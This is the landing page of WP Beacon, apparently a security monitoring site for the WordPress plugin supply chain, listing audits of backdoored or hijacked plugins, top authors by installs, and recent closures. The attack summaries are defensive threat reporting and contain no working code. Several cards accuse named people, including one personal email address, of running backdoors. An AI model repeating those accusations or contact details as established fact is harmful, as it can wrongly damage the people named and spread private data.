WP Beacon

Watching the WordPress plugin supply chain.

WP Beacon tracks every plugin on wordpress.org — its authors, committers, and releases — to flag ownership transfers, dormant-then-activated takeovers, and release patterns that match known attacks.

Plugins watched
112,853
49,691 closed
Authors tracked
68,494
Installs covered
338.2M+
active installs across all plugins
Forensic audits
19
13 malicious

Active plugin hijacks

All audits →

Plugins where a malicious author still controls the wordpress.org distribution. Tap any card for the full audit, IOCs, and the steps the author can take to clear this label. Labels clear automatically once wp beacon scan-deltas confirms the hijack is gone from trunk.

Closed by wp.org · trunk uncleaned

Quick Page/Post Redirect Plugin — 70k+ installs

The original author intentionally weaponized wordpress.org distribution to seed an out-of-band update channel they controlled — and then served tampered builds through that channel after the wp.org-distributed code went…

Actor: anadnet — original wp.org plugin author. Self-implanted backdoor, no acquisition or account inheritance involv… Audit #13 · 12 IOCs · Read full report →
Closed by wp.org · trunk uncleaned

33 plugins — 180k+ active installs

Marketplace acquisition of an established 30-plugin portfolio used as a vehicle for a fleet-wide PHP-deserialization RCE backdoor with on-chain C2 resolution.

Actor: "Kris" — Flippa buyer of the WP Online Support / Essential Plugin portfolio (~33 plugins, six figures, early 2… Audit #4 · 15 IOCs · Read full report →
Closed by wp.org · trunk uncleaned

Scroll To Top — 20k+ installs

Update-checker hijack with active stored-XSS / RCE primitives served from a Panama-fronted C2.

Actor: Benjamin (wp.org @milkitall, GitHub tombenj, tomgolan@gmail.com) — operates the inherited @satrya SVN account Audit #12 · 11 IOCs · Read full report →
Closed by wp.org · trunk uncleaned

27 plugins — 5k+ active installs

SiteGuarding 27-plugin portfolio (2013-2020) — 15 plugins shipped siteguarding_tools.php v1.7 RCE backdoor INLINE in the plugin folder; 12 sibling plugins shipped phone-home guideline violations. wp.org closed all 27 in…

Actor: SiteGuarding (SafetyBis Ltd. — Cyprus HE 232905, dissolved 2016-01-11). 13-year operation, 27 plugins under @s… Audit #28 · 7 IOCs · Read full report →
Closed by wp.org · trunk uncleaned

Web Image Optimization X — 100 installs

Attacker-controlled side-channel update endpoint shipped under the cover of "license validation" — same operator (SiteGuarding) and same sibling-plugin pair as audit #25 (wp-advanced-math-captcha). Where the wp-advanced-…

Actor: SiteGuarding (cmsplughub.com C2; wp.org account @dalielsam, sole plugin) Audit #26 · 15 IOCs · Read full report →

Top authors by install base

Full list →

The accounts with the biggest blast radius on wp.org. A new committer suddenly appearing under any of these is always worth a second look.

# Author Member since Plugins Installs
1 Syed Balkhi 2008-06-22 94 23.5M+
2 Automattic 2009-11-05 75 19.1M+
3 Yoast 2013-11-14 7 14.2M+
4 Elementor 2018-05-10 12 12.1M+
5 WordPress.org 2010-03-24 19 11.6M+
6 Rock Lobster Inc. 2025-09-17 6 11.1M+
7 Brainstorm Force 2011-09-08 32 7.8M+
8 LiteSpeed Technologies 2016-01-20 2 7M+
9 David Anderson / Team Updraft 2008-01-02 16 6.4M+
10 Google 2006-11-17 3 5.1M+

Recent closures

All closures →
Plugin Author Closed Reason
Restricted Blocks – Conditional Visibility Settings for the Block Editor daext 3d ago author-request
myCred for BuddyPress Compliments saadiqbal 4d ago author-request
myCred for Rating Form saadiqbal 4d ago author-request
myCred – MemberPress Integration (Gamification for Membership Sites) saadiqbal 4d ago author-request
myCred Credly saadiqbal 4d ago author-request